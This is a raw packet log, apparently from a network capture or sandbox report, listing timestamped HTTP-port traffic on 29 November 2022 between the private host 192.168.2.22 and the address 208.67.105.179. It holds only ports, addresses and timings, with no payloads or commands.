Nov 29, 2022 16:50:19.386415005 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386436939 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386460066 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386497021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386508942 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386543036 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386555910 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386609077 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386640072 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386661053 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386674881 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386712074 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386733055 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386754990 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386765957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386809111 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386826038 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386845112 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386858940 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386900902 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.386921883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386962891 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.386984110 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387001038 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387020111 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387054920 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387073994 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387110949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387125969 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387161970 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387176991 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387214899 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387236118 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387275934 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.387286901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.387327909 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.404854059 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.415020943 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.415066957 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.415092945 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.415112019 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.415131092 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.415157080 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.415157080 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.415194035 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.427968979 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428016901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428041935 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428066015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428091049 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428124905 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428138018 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428138018 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428167105 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428193092 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428220987 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428232908 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428258896 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428273916 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428289890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428307056 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428337097 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428349972 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428371906 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428390026 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428416014 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428426981 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428447962 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428459883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428484917 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428497076 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428510904 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428529024 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428538084 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428555965 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428563118 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428580046 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428587914 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428606033 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428615093 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428632975 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428641081 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428667068 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428675890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428700924 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428711891 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428731918 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428745985 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428757906 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428776026 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428788900 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428801060 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428813934 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428831100 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428843021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428857088 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428875923 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428886890 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428910017 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428921938 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428950071 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.428961039 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428982019 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.428993940 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.429013014 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.429030895 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.429039001 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.429047108 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.429060936 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.429287910 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.435049057 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.435097933 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.435163021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.435163021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.445637941 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445683956 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445710897 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445729971 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445749998 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445785046 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.445818901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445831060 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.445856094 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.445871115 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445897102 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.445907116 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.445931911 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.458925962 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.458981037 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459009886 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459037066 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459064007 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459085941 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459106922 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459121943 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459121943 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459145069 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459171057 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459183931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459212065 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459219933 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459237099 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459252119 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459268093 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459316015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459330082 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459358931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459367037 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459402084 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459429026 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459453106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459465981 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459490061 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459502935 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459532976 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459542990 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459567070 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459582090 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459608078 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459621906 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459640026 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.459656000 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.459695101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461754084 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461802006 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461829901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461853981 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461878061 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461899996 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461899996 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461921930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461921930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461932898 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.461961985 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.461987972 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462007046 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462027073 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462027073 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462040901 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462059021 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462086916 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462097883 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462116957 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462135077 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462160110 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462172985 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462197065 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462207079 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462232113 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462245941 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462260008 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462281942 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462307930 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462321997 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462348938 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462368011 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462395906 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462408066 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462435007 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462445021 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462472916 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.462481976 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.462510109 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.464590073 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.464636087 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.464662075 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.464772940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.464772940 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.464811087 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.471097946 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.471313000 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.474796057 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.474832058 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.474850893 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.474869013 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.474908113 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.474956036 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.474972963 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.474987030 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.475030899 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.475039959 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.487757921 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.487818956 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.487854004 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.487888098 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.487922907 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.488025904 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.488027096 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.488080978 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.488116026 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.488149881 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516297102 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516334057 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516354084 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516379118 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516405106 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516429901 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516458988 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516472101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516490936 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516505957 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516529083 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516560078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516571999 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516581059 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516606092 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516629934 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516655922 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516680002 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516738892 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516757965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516757965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516757965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516757965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516757965 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516779900 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516803980 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516828060 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516841888 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516860962 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516872883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516896963 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516906977 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516925097 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.516940117 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516964912 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.516989946 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517005920 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517016888 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517040968 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517051935 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517069101 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517087936 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517111063 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517122030 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517159939 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517187119 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517214060 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517234087 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517247915 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517258883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517283916 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517296076 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517328024 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517353058 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517378092 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517393112 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517416000 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517426014 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517447948 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517462015 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517487049 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517497063 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517523050 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517532110 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517584085 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517591953 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517618895 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517644882 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517667055 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517667055 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517679930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517715931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517750025 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517760992 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517785072 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517827988 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517855883 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517868042 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517890930 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517903090 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517927885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.517940998 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517956972 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.517997026 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.518023014 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.518033028 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.518090010 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.518101931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.518140078 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.525291920 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.525429010 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545545101 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545594931 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545620918 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545648098 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545672894 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545696974 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545722961 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545748949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545748949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545748949 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545773029 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545782089 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545806885 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545819044 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545819044 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545849085 CET	80	49171	208.67.105.179	192.168.2.22
Nov 29, 2022 16:50:19.545864105 CET	49171	80	192.168.2.22	208.67.105.179
Nov 29, 2022 16:50:19.545890093 CET	80	49171	208.67.105.179	192.168.2.22
